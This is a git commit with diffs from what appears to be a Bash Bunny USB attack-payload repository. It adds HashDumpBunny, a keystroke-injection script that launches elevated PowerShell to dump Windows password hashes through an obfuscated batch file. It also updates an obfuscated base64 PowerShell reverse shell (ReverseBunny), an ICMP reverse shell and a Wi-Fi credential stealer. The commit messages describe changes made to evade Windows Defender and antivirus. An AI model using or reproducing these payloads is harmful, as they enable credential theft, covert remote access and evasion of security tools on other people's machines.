Uploaded HashDumpBunny + some fixes (#491)

* Uploaded ReverseBunny

Obfuscated reverse shell via powershell

* Uploaded WifiSnatch

Get your targets stored wifi information and credentials, store them on your Bashbunny and hop away 🐇

* Update ReverseBunny.txt

Changed payload to evade Windows Defender

* Update payload.txt

Added new "Eject Method" - props to Night(9o3)

* Update README.md

* Deleted ReverseBunny.txt

Deleted because of higher risk to get caught by AV

* Updated ReverseBunny to version 1.2

Updated ReverseBunny to version 1.2.
- Deleted payload on disk because of AV
- Added custom shell design

* Updated ReverseBunny to version 1.2

Updated README for ReverseBunny update

* Updated payload

fixed some stupid left overs <3

* Uploaded pingUinBunny

a reverse shell using icmp

* Delete payloads/library/remote_access/switch1 directory

* Uploaded pingUinBunny

A reverse shell using icmp

* Update README.md

* Update README.md

* Updated to PingZhell

* Update Bunny.pl

* Update README.md

* Update README.md

* Update payload.txt

* Rename payloads/library/remote_access/pingUinBunny/Bunny.pl to payloads/library/remote_access/PingZhellBunny/Bunny.pl

* Rename payloads/library/remote_access/pingUinBunny/PingZhell.ps1 to payloads/library/remote_access/PingZhellBunny/PingZhell.ps1

* Rename payloads/library/remote_access/pingUinBunny/README.md to payloads/library/remote_access/PingZhellBunny/README.md

* Rename payloads/library/remote_access/pingUinBunny/payload.txt to payloads/library/remote_access/PingZhellBunny/payload.txt

* Update payload.txt

* Update README.md

* Update README.md

* Update Bunny.pl

* Created ProcDumpBunny

Dump lsass.exe with a renamed version of procdump and get the users hashes with Mimikatz

* Update README.md

* Update payload.txt

* Updated ReverseBunny

Fixed wrong DELAY commands

* Updated PingZhellBunny

Fixed wrong DELAY commands

* Updated WifiSnatch

Fixed multiple mistakes

* Uploaded HashDumpBunny

Use your BashBunny to dump the user hashes of your target - similar to the msf post-module.
The script was obfuscated with multiple layers, so don't be confused.
If you don't trust this script, run it within a save testing space - which should be best practice anyways ;)

* added example picture

* Update README.md

payloads/library/credentials/HashDumpBunny/README.md

@@ -0,0 +1,19 @@
+**Title: HashDumpBunny**
+
+Author: 0iphor13
+
+Version: 1.0
+
+**Instruction:**
+
+This payload will run an obfuscated script to dump user hashes. If you don't trust this obfuscated .bat file, you should run it within a save space first - which should be best practice anyways ;-)
+
+#
+
+**Instruction:**
+
+Place BunnyDump.bat in the same payload switch-folder as your payload.txt
+#
+Plug in BashBunny.
+Exfiltrate the out.txt file and try to crack the hashes.
+![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/HashDumpBunny/censoredhash.png)

payloads/library/credentials/HashDumpBunny/payload.txt

@@ -0,0 +1,44 @@
+#!/bin/bash
+#
+# Title:         HashDumpBunny
+# Description:   Dump user hashes with this script, which was obfuscated with multiple layers.
+# Author:        0iphor13
+# Version:       1.0
+# Category:      Credentials
+# Attackmodes:   HID, Storage
+
+LED SETUP
+
+Q DELAY 500
+
+GET SWITCH_POSITION
+DUCKY_LANG de
+
+Q DELAY 500
+
+ATTACKMODE HID STORAGE
+
+#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING
+
+LED STAGE1
+
+#After you have adapted the delays for your target, add "-W hidden"
+Q DELAY 1000
+RUN WIN "powershell Start-Process powershell -Verb runAs"
+Q ENTER
+Q DELAY 1000
+Q ALT j
+Q DELAY 250
+
+Q DELAY 250
+Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\BunnyDump.bat')"
+Q DELAY 250
+Q STRING " ;mv out.txt ((gwmi win32_volume -f 'label=''BashBunny''').Name+'\loot');\$bb = (gwmi win32_volume -f 'l"
+Q DELAY 250
+Q STRING "abel=''BashBunny''').Name;Start-Sleep 1;New-Item -ItemType file \$bb'DONE';(New-Object -comObject Shell.Application).Nam"
+Q DELAY 250
+Q STRING "espace(17).ParseName(\$bb).InvokeVerb('Eject');Start-Sleep -s 5;Exit"
+Q DELAY 300
+Q ENTER
+
+LED FINISH

payloads/library/exfiltration/WifiSnatch/payload.txt

@@ -3,7 +3,7 @@
 # Title:         WifiSnatch
 # Description:   Extract wifi information, such as passphrases & SSIDs
 # Author:        0iphor13
-# Version:       1.0
+# Version:       1.1
 # Category:      Exfiltration
 # Attackmodes:   HID, Storage
 
@@ -20,18 +20,19 @@ ATTACKMODE HID STORAGE
 
 LED STAGE1
 
-DELAY 5000
+Q DELAY 1500
 RUN WIN "powershell -NoP -W hidden -NonI -Exec Bypass"
-DELAY 5000
+Q DELAY 500
+Q ENTER
 
 Q STRING "Set-Clipboard -Value (gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\exfil.txt'))"
-DELAY 10000
+Q DELAY 2000
 Q ENTER
-DELAY 10000
+Q DELAY 1000
 Q CONTROL v
-DELAY 10000
+Q DELAY 1000
 Q ENTER
-DELAY 1000
+Q DELAY 1000
 
 LED STAGE2
 
@@ -44,12 +45,12 @@ LED CLEANUP
 
 rm /root/udisk/DONE
 
-DELAY 100
+Q DELAY 100
 
 sync
 
-DELAY 100
+Q DELAY 100
 
 LED FINISH
 
-#SAVE TO EJECT
+#SAVE TO EJECT

payloads/library/remote_access/PingZhellBunny/payload.txt

@@ -9,12 +9,12 @@
 
 LED SETUP
 
-DELAY 500
+Q DELAY 500
 
 GET SWITCH_POSITION
 DUCKY_LANG de
 
-DELAY 500
+Q DELAY 500
 
 ATTACKMODE HID STORAGE
 
@@ -23,16 +23,16 @@ ATTACKMODE HID STORAGE
 LED STAGE1
 
 #After you have adapted the delays for your target, add "-W hidden"
-DELAY 5000
+Q DELAY 1500
 RUN WIN "powershell -Exec Bypass -NoP -NonI"
-DELAY 6000
+Q DELAY 500
 Q ENTER
 
-DELAY 20000
+Q DELAY 1000
 Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\PingZhell.ps1')"
-DELAY 20000
+Q DELAY 3000
 Q ENTER
-DELAY 15000
+Q DELAY 1000
 
 ATTACKMODE HID
 

payloads/library/remote_access/ReverseBunny/payload.txt

@@ -3,7 +3,7 @@
 # Title:         ReverseBunny
 # Description:   Get remote access using obfuscated powershell code - If caught by AV, feel free to contact me.
 # Author:        0iphor13
-# Version:       1.2
+# Version:       1.3
 # Category:      Remote_Access
 # Attackmodes:   HID
 
@@ -16,32 +16,32 @@ ATTACKMODE HID
 #If needed, use this option
 #WAIT_FOR_PRESENT Your_Device
 
-DELAY 5000
+Q DELAY 1500
 Q GUI r
-DELAY 5000
+Q DELAY 500
 Q STRING "powershell -NoP -NonI -W hidden"
-DELAY 5000
+Q DELAY 500
 Q ENTER
 
-DELAY 1000
+Q DELAY 250
 Q STRING "\$I='0.0.0.0';\$P=4444;&(\$SHellid[1]+\$shELlId[13]+'x')(NEw-ObJECt sYstem.iO.coMPRESsIOn.dEFLateSTReAm([sYstEM.I"
-DELAY 1000
+Q DELAY 250
 Q STRING "o.MEmORyStReAm] [sYstEM.cOnvErT]::frOMBasE64sTrIng('jVJhb9owEP3c/IpT5A1HBUNXdR8apWqJPBSNUdSkWyuCogAWpAIHJa5K2vS/72yaqeoH"
-DELAY 1000
+Q DELAY 250
 Q STRING "urN8nH3Pz88vkNmjlJV3aVsWHB3ROEmSrgNgFl6LtbxmYTsJTisxAQfiE4RVawTEBxg+QSBDnXSh29yz/8WRmHM6NQjd3Xf+ZT2RAaPbBX1LDIjEqoYWvh1R"
-DELAY 1000
+Q DELAY 250
 Q STRING "9X6lueq30UJgk83QGmIsENWN4fe+0h2IzTFoNOhcw4ehd6wYc5zERm2MSFNhjW1NiknPfaNtOnWT9Q4yHPoKn4Umbhj6FUAv267y4uT0/xmMzDcGa1yIsoQJ"
-DELAY 1000
+Q DELAY 250
 Q STRING "l0oUU1A5zHOpMvkoGGOWZV+6lkWG6Tpd+4+lyjfgwSQSO8W4nOeLTC6n5+dXoR8EbCBUv1KipMT8MR19cO5J/tTJ+w/cVxDel4pv2IgrFl7Pf3JVssgf"
-DELAY 1000
+Q DELAY 250
 Q STRING "++sA76YkaJOx45LSI3NNFUaFuNpQvcOeikwJ+l5Fu9d+v2RDIZdq5biTGSqYTKdk5vUY+352dnpWf3npvbpPq2AoKCWZh3w3PF2gSk0yw6OjZbRynI4U0HN"
-DELAY 1000
+Q DELAY 250
 Q STRING "eXLLw6AhFX/cfhB9BJ7rfilG64VDel5H4xSJxp5h5ceOAY/Sqm0Au31gzlP3s0UzcAVnAt4uvJ3V+qzr4pmw0wN7OI8/Hdl/bdDkOwT6myNAZ5vNUZbl02DZ"
-DELAY 1000
+Q DELAY 250
 Q STRING "Vq2P7AmyXVB6dKO23+OA33srR8Iij4Ttj058i0DZVWkHFhlwO8F268WN9G66o8+qitf46Dzl1rL8='),[Io.COmpressIoN.coMPressiONmoDe]::decOMp"
-DELAY 1000
+Q DELAY 250
 Q STRING "ReSS ) | %{ NEw-ObJECt  systEm.io.STREAmReadEr(\$_ , [sysTeM.TExt.encODIng]::AscIi)}| % {\$_.readTOeNd()} )"
-DELAY 1000
+Q DELAY 250
 Q ENTER
 
 LED FINISH